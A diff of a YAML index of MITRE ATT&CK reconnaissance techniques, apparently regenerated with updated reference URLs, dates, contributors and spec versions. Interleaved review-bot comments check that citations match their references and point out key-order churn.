atomic_tests: []
T1598.004:
technique:
@@ -92410,7 +93101,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -92432,7 +93122,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -92448,34 +93138,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -92484,15 +93150,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
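Review bot: the SecurityTrails Google Hacking reference keeps its author and date (Borges, E., 2019, March 5) but its URL moves from securitytrails.com/blog/google-hacking-techniques to a recordedfuture.com google-dorks page, with the retrieved date bumped to September 12, 2024; SecurityTrails is now part of Recorded Future, so a migration is plausible, but verify the new page is the same article rather than a different piece, otherwise the citation misattributes it. The rest of the hunk is key relocation (`id`, `type`, `created`, `external_references`, `x_mitre_platforms`, `x_mitre_domains`) plus `x_mitre_attack_spec_version` 2.1.0 to 3.2.0 and a new `revoked: false`.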
@@ -92514,7 +93203,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -92530,8 +93219,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -92592,29 +93279,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -92623,15 +93291,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -92657,7 +93344,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -92675,47 +93362,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -92724,19 +93374,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
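Review bot: cross-checking the removed T1598.002 block in the preceding hunk against the keys re-added here shows nothing lost apart from the intended `spec_version` and 2.1.0 spec marker: all four references survive (reordered, with the `ACSC Email Spoofing` URL moved to a web.archive.org snapshot), `x_mitre_modified_by_ref` moves from above `x_mitre_data_sources` to the end of the object, and `revoked: false` and `x_mitre_deprecated: false` are new. One upstream inconsistency to be aware of rather than hand-fix: the ACSC entry keeps `Retrieved October 19, 2020` after switching to an archive URL, whereas the `OPM Leak` entry in the T1589.003 hunk above updated its retrieval date when it did the same. Repeat this key-by-key check for T1589.003, T1597 and T1595.001, whose remove-and-re-add blocks have the same shape.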
@@ -92759,7 +93445,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -92775,8 +93461,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -92802,7 +93486,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -92818,8 +93502,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -92847,7 +93529,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -92863,12 +93545,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -92877,16 +93557,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
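Review bot: this hunk is pure key reordering for T1593 (`x_mitre_platforms`, `x_mitre_is_subtechnique` and `x_mitre_deprecated` move below `x_mitre_detection` and `x_mitre_domains`) with no value changes, and the same churn is what turns the T1589.003, T1598.002, T1597 and T1595.001 objects into full remove-and-re-add blocks. Have the generator emit keys in a stable order (sorted, or the order of the previous index) so a regeneration diff shows only real value changes and a dropped field would stand out instead of hiding inside a reorder.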
@@ -92899,8 +93579,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -92911,52 +93591,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
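Review bot: citation bookkeeping checks out for T1597: the description drops `(Citation: D3Secutrity CTI Feeds)` and the matching `D3Secutrity CTI Feeds` entry leaves `external_references` in the same hunk, while `(Citation: ZDNET Selling Data)` is still cited and its entry is kept, so no dangling citation is introduced; the `x_mitre_version` bump to `'1.1'` and the added contributor are consistent with a description edit. Worth running the same citation-to-reference check over the whole regenerated file rather than by eye, since a `(Citation: ...)` tag with no `external_references` entry is the kind of upstream defect this index would silently inherit.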
@@ -92978,7 +93656,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -92994,8 +93672,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -93021,7 +93697,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -93039,8 +93715,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -93062,7 +93736,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -93078,12 +93752,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -93093,17 +93765,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
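Review bot: the rewritten T1589.001 description introduces three new tags, `Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023` and `Bleeping Computer Stealer Logs 2023`, and each has a matching `external_references` entry added in the later hunks of this object, so the cross-references resolve. One upstream wording issue to know about rather than fix here: the leak-related citations (`Register Deloitte` through `CNET Leaks`) now sit directly after the ScanBox sentence, while the sentence they support about exposure via leaks to online data sets has moved to the next paragraph and is left without a citation.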
@@ -93115,6 +93790,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -93125,7 +93801,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -93135,6 +93811,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
